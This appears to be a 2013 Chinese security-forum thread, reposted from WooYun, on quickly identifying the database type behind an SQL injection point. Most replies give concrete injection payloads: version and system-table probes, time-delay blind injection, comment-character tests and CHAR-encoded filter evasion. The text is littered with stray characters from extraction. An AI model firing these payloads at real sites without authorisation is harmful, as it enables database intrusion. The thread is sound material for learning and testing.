一个注射点如何最快速确认是什么类型数据库
5 Q6 W/ R7 P# `9 }+ S0 Q0 E2 O! Txsser (十根阳具有长短!!) | 2013-02-05 12:36
4 i3 b4 K. v0 w3 @假设这么一个注射点:0 Q* L8 {6 ^; `- }, j5 @( N
show.html?id=2
/ A" j- u% r! H9 lmysql:id=2 and version()>06 ], ~! Y) P9 q3 J/ F3 @6 f
oracle:id=2 and '1'||'1'='11
' Y9 q( E. f4 ]其他的欢迎补充
0 k; M9 G! C% u* g8 s; N) D1#; |1 ]4 b8 l( F( l( S, L' K
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 12:47
9 {6 w, m7 [" f4 VAccess:
. D; H# r0 v* N) F3 Q, H/ H# xaNd aSc(cHr(97))=97
_0 E) P6 a7 \& d8 K: ]and exists(select id from MSysAccessObjects)
9 \: g, P) n. s. p' ~* }% lSQL Server:
' d) S% T9 y# E+ I; O6 y- Nand exists(select id from sysobjects)
; W" `# `* m+ D# }3 Xand length(user)>0
2 n/ f2 C! a' a' o/ d5 m/ I0 VMySQL:4 e/ M1 Z# q7 h5 i
and length(user())>0
0 t& q0 I. E+ K* {/ X) K7 v" R4 E2#$ {: {7 e9 l# v$ l& \
xsser (十根阳具有长短!!) | 2013-02-05 12:48
2 Q8 g8 r1 _, a7 S7 {6 O2 B/ h# w@upload 如果这些都不是呢…1 ]; J" G, H N$ o1 Q! {
3#, p! G$ L @3 i' Z, Q- R8 o+ q z
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:03
$ l9 }0 m3 E# d@xsser 不快速的,延时注入. V$ r' i" p* s4 `: i' I
不知道这样写对不对, F' y% h/ l. Q+ E" f
mssql:id=2 and IF(ascii(SUBSTRING('name',1,1))>0)waitfor delay'0:00:3'0 Q5 H$ U" L# J; T
mysql:id=2 and select benchmark(1e8,current_date());6 o* V4 G. T! s4 ?2 i+ R! p
4#2 h% d& x1 b6 }& n1 `
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:10
- E) S6 c+ M4 F1 d4 ~* m最快的貌似是看报错信息
. I* q3 M; z1 U5 g9 Uoracle error
3 W% G0 _; K" z. \2 Xmssql error8 ^. Y6 R a6 h# R# N/ g$ ^
mysql error
" s7 y& `' J7 V6 _5#9 x4 ?5 K# \/ U+ i
Nimda (你们都是坏银~) | 2013-02-05 13:14
. ^) S) |& \& B小菜献丑来一发 Oracle:id=2 and 0<>(select count(*) from dual)( R$ d: c! S! z8 ~+ r& o' {5 B4 F
6#
1 v8 i; G9 i5 P. R1 y& N. J/ Zupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:21; N0 r3 z& v2 E/ k0 \) ^ b# q2 ~
“/*”是MySQL中的注释符,返回错误说明该注入点不是MySQL,继续提交如下查询字符:
: k! K" x9 i' `4 K' a/ }+ o6 m“–”是Oracle和MSSQL支持的注释符,如果返回正常,则说明为这两种数据库类型之一。继续提交如下查询字符:
8 C D" e( l* K n/ Q“;”是子句查询标识符,Oracle不支持多行查询,因此如果返回错误,则说明很可能是Oracle数据库。
) F: P6 F1 p: Y, S7#
* L9 o& D+ @# o; Y% P_Evil (HackEnd) | 2013-02-05 13:331 e. W W n! l- q1 U* Y
PostgreSQL
. ?0 q' Z5 S2 @% [/ y' g8#
$ P9 \+ s8 E$ H8 f! M: r" Gupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:42" w l3 Y: w6 |4 u# y
切换编码 and 1=1
5 c5 n! F% j7 Y+ p% D2 Yoracle:) b* j& O& k& ?' D, j7 X
CHR(97) || CHR(110) || CHR(100) || CHR(32) || CHR(49) || CHR(61) || CHR(49)
& E% n, ?* l# r, y8 {2 M/ a' emssql:
& ^7 @* J% D Q( E& j& H/ PCHAR(97) + CHAR(110) + CHAR(100) + CHAR(32) + CHAR(49) + CHAR(61) + CHAR(49)% N8 f" j" N; G6 c/ W% g) N7 G2 q
mysql:4 F# u! z! b6 X2 @3 A$ a" G: y/ ?
CHAR(97, 110, 100, 32, 49, 61, 49)
% h5 \" r+ ^/ k4 w- m; a9#" W* d' C! p3 u
xsser (十根阳具有长短!!) | 2013-02-05 14:31% ^" |# h t9 ^$ `: u, O9 k
@upload 比较常见的数据库这些还是可以判断的,但是还有其他奇葩类型的呢?. I0 v5 D8 t6 z6 |7 h+ g
10#$ @ B3 Z0 [# e
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 14:46
# s R5 R0 T. I@xsser 是奇葩数据库类型的么?# E8 G# E" o; q5 z! K
根据注入的原理,我们可以猜想,要成功的注入,必须使得注入后的一片和谐,那么使用该类数据库特性来判断,综上所述:' T$ j; [- g% r. R; u
1.是否可以使用特定的函数来判断,该数据库特有的
. Q5 P! L Q( h8 b0 n3 w" s2.是否可以使用辅助的符号来判断,如注释符号、多语句查询符等等
! r( P! Y9 V- K/ v. o$ F- x5 w3.是否可以编码查询
& n% i/ X9 r2 G+ y) C1 S) h8 L4.是否显可以利用错信息
* M4 O/ R6 o* n2 ]5.是否存在数据库某些特性辅助判断 x# [$ W' b5 z1 ^9 _
个人见解
! O( ~- A$ _: G0 d% o( Q. ^3 c11#' f) W8 |+ D+ Q* s# x: M
小胖子 (z7y壮士,来,干了这碗酒!) | 2013-02-05 14:55
3 K& T6 x. R7 ^4 H7 X5 K) B: U已收藏,mssql可以直接看到错误提示的吧~
! z @( D0 ?2 R# o( f! i12#
7 b% a0 S3 A9 A" F/ D7 xPasser_by | 2013-02-05 15:09
6 Q& ?) J) i1 t" \. x曾被 @GaRY 面过我这题。。。紧张了。。后来回家sqlmap判断注射点的时候抓包看了下。。。一抓包全出来了居然。。
3 b$ W5 _ |+ ]+ vfrom:http://zone.wooyun.org/content/260 |
发表于 2013-2-11 09:54:04
收藏
支持
反对